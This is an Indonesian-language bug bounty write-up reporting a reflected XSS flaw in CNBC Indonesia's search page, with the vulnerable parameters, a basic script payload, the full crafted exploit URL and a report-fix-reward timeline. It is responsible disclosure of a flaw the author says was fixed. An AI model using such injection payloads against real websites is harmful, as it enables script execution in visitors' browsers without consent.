XSS REFLECTED DI CNBC INDONESIA VIA SEARCH ENGINE PARAMETER

Hi, Bug Hunter & Teman-teman smua.

Di write up kali ini saya bakal membahas tentang XSS REFLECTED DI CNBC INDONESIA

Dikasus ini sih hanya memakai payload biasa saja kok :)

Tidak ada bypass payload juga :D tapi gapapa lah dan lagi gabut juga :D

Baik, langsung ke topik nya saja

Vuln XSS REFLECTED :

https://www.cnbcindonesia.com/search?query=hhh&kanal=&tipe=&date=

XSS REFLECTED berada di parameter /search?query=&kanal=&date=

Payload :

<script>prompt(1)</script>

Final :

https://www.cnbcindonesia.com/search?query=hhh&kanal=&tipe=foto&date=2020/11/09%22%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E

Dan pop up muncul :D

Pop up CNBC Indonesia

Timeline :

Report : 12/11/2020

Fix : 29/12/2020

Rewards : 22/01/2021